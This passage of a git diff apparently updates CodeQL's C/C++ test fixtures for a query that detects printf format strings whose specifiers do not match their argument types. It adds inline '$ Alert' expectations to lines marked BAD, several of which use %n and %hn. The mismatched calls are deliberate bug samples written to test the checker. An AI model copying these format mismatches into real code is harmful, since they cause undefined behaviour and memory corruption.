printf("%2$*2$.*1$s", i, s); // BAD - printf("%2$*1$.*2$s", i, s); // BAD - printf("%1$*1$.*1$s", i, s); // BAD + printf("%2$*2$.*1$s", i, s); // BAD // $ Alert + printf("%2$*1$.*2$s", i, s); // BAD // $ Alert + printf("%1$*1$.*1$s", i, s); // BAD // $ Alert // left justify flag printf("%-4s", s); // GOOD printf("%1$-4s", s); // GOOD - printf("%-4i", s); // BAD - printf("%1$-4i", s); // BAD + printf("%-4i", s); // BAD // $ Alert + printf("%1$-4i", s); // BAD // $ Alert printf("%1$-4s", s, i); // GOOD - printf("%2$-4s", s, i); // BAD + printf("%2$-4s", s, i); // BAD // $ Alert printf("%1$-.4s", s, i); // GOOD - printf("%2$-.4s", s, i); // BAD + printf("%2$-.4s", s, i); // BAD // $ Alert printf("%1$-4.4s", s, i); // GOOD - printf("%2$-4.4s", s, i); // BAD + printf("%2$-4.4s", s, i); // BAD // $ Alert printf("%1$-*2$s", s, i); // GOOD - printf("%2$-*2$s", s, i); // BAD - printf("%1$-*1$s", s, i); // BAD + printf("%2$-*2$s", s, i); // BAD // $ Alert + printf("%1$-*1$s", s, i); // BAD // $ Alert } void myvsnprintf(const char *format_string, char *target, size_t buffer_size, va_list args) @@ -273,7 +273,7 @@ void usemyprintf(int i, char *s) char buffer[1024]; mysprintf("%i", buffer, 1024, i); // GOOD - mysprintf("%i", buffer, 1024, s); // BAD + mysprintf("%i", buffer, 1024, s); // BAD // $ Alert myprintf("%i", i); // GOOD - myprintf("%i", s); // BAD + myprintf("%i", s); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h index eefb84993e74..6e592a95dc04 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h index 73bdee5b8b11..65042f843003 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h @@ -22,7 +22,7 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp index 596e7ac73fc3..7eaeefab48e3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp @@ -40,12 +40,12 @@ void test2() { void test3() { char string[20]; - sprintf(string, "test %s", u"test"); // BAD: `char16_t` string parameter read as `char` string + sprintf(string, "test %s", u"test"); // BAD: `char16_t` string parameter read as `char` string // $ Alert } void test4() { char string[20]; - sprintf(string, "test %S", L"test"); // BAD: `wchar_t` string parameter read as `char16_t` string + sprintf(string, "test %S", L"test"); // BAD: `wchar_t` string parameter read as `char16_t` string // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h @@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h index 60ee2c8caade..6b2151e013b1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h @@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } @@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } typedef unsigned int wint_t; @@ -165,8 +165,8 @@ void fun4() long long ll; unsigned long long ull; - printf("%qi\n", i); // BAD - printf("%qu\n", ui); // BAD + printf("%qi\n", i); // BAD // $ Alert + printf("%qu\n", ui); // BAD // $ Alert printf("%qi\n", l); // GOOD printf("%qu\n", ul); // GOOD printf("%qi\n", ll); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h index eefb84993e74..6e592a95dc04 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h index 73bdee5b8b11..65042f843003 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h @@ -22,7 +22,7 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h @@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h index 2fb361d485c5..80e8b74d9a33 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h @@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } @@ -59,20 +59,20 @@ void g() const SIZE_T C_ST = sizeof(st); ssize_t sst; - printf("%zu", ul); // not ok + printf("%zu", ul); // not ok // $ Alert printf("%zu", st); // ok printf("%zu", ST); // ok printf("%zu", c_st); // ok printf("%zu", C_ST); // ok printf("%zu", sizeof(ul)); // ok - printf("%zu", sst); // not ok + printf("%zu", sst); // not ok // $ Alert printf("%zd", ul); // not ok [NOT DETECTED] - printf("%zd", st); // not ok - printf("%zd", ST); // not ok - printf("%zd", c_st); // not ok - printf("%zd", C_ST); // not ok - printf("%zd", sizeof(ul)); // not ok + printf("%zd", st); // not ok // $ Alert + printf("%zd", ST); // not ok // $ Alert + printf("%zd", c_st); // not ok // $ Alert + printf("%zd", C_ST); // not ok // $ Alert + printf("%zd", sizeof(ul)); // not ok // $ Alert printf("%zd", sst); // ok { char *ptr_a, *ptr_b; @@ -81,7 +81,7 @@ void g() printf("%tu", ptr_a - ptr_b); // ok printf("%td", ptr_a - ptr_b); // ok printf("%zu", ptr_a - ptr_b); // ok (dubious) - printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] + printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ Alert } } @@ -113,8 +113,8 @@ void fun2() { printf("%S", myString1); // GOOD printf("%S", myString2); // GOOD - printf("%S", myString3); // BAD - printf("%S", myString4); // BAD + printf("%S", myString3); // BAD // $ Alert + printf("%S", myString4); // BAD // $ Alert } typedef void *VOIDPTR; @@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } typedef unsigned int wint_t; @@ -178,21 +178,21 @@ void fun4() printf("%I32u\n", ui); // GOOD printf("%I32i\n", l); // GOOD printf("%I32u\n", ul); // GOOD - printf("%I32i\n", ll); // BAD - printf("%I32u\n", ull); // BAD + printf("%I32i\n", ll); // BAD // $ Alert + printf("%I32u\n", ull); // BAD // $ Alert printf("%I32i\n", i32); // GOOD printf("%I32u\n", u32); // GOOD - printf("%I32i\n", i64); // BAD - printf("%I32u\n", u64); // BAD + printf("%I32i\n", i64); // BAD // $ Alert + printf("%I32u\n", u64); // BAD // $ Alert - printf("%I64i\n", i); // BAD - printf("%I64u\n", ui); // BAD - printf("%I64i\n", l); // BAD - printf("%I64u\n", ul); // BAD + printf("%I64i\n", i); // BAD // $ Alert + printf("%I64u\n", ui); // BAD // $ Alert + printf("%I64i\n", l); // BAD // $ Alert + printf("%I64u\n", ul); // BAD // $ Alert printf("%I64i\n", ll); // GOOD printf("%I64u\n", ull); // GOOD - printf("%I64i\n", i32); // BAD - printf("%I64u\n", u32); // BAD + printf("%I64i\n", i32); // BAD // $ Alert + printf("%I64u\n", u32); // BAD // $ Alert printf("%I64i\n", i64); // GOOD printf("%I64u\n", u64); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h index e88d0318bb05..9eb5fd0bb23c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h index 672329b62706..3f9abeb01824 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h @@ -22,9 +22,9 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD - printf("%wc", L"c"); // BAD + printf("%wc", L"c"); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h @@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h index 8222cfa67b25..90fd490c9544 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h @@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } @@ -59,20 +59,20 @@ void g() const SIZE_T C_ST = sizeof(st); ssize_t sst; - printf("%zu", ul); // not ok + printf("%zu", ul); // not ok // $ Alert printf("%zu", st); // ok printf("%zu", ST); // ok printf("%zu", c_st); // ok printf("%zu", C_ST); // ok printf("%zu", sizeof(ul)); // ok - printf("%zu", sst); // not ok + printf("%zu", sst); // not ok // $ Alert printf("%zd", ul); // not ok [NOT DETECTED] - printf("%zd", st); // not ok - printf("%zd", ST); // not ok - printf("%zd", c_st); // not ok - printf("%zd", C_ST); // not ok - printf("%zd", sizeof(ul)); // not ok + printf("%zd", st); // not ok // $ Alert + printf("%zd", ST); // not ok // $ Alert + printf("%zd", c_st); // not ok // $ Alert + printf("%zd", C_ST); // not ok // $ Alert + printf("%zd", sizeof(ul)); // not ok // $ Alert printf("%zd", sst); // ok { char *ptr_a, *ptr_b; @@ -81,7 +81,7 @@ void g() printf("%tu", ptr_a - ptr_b); // ok printf("%td", ptr_a - ptr_b); // ok printf("%zu", ptr_a - ptr_b); // ok (dubious) - printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] + printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ Alert } } @@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } void fun4() @@ -152,21 +152,21 @@ void fun4() printf("%I32u\n", ui); // GOOD printf("%I32i\n", l); // GOOD printf("%I32u\n", ul); // GOOD - printf("%I32i\n", ll); // BAD - 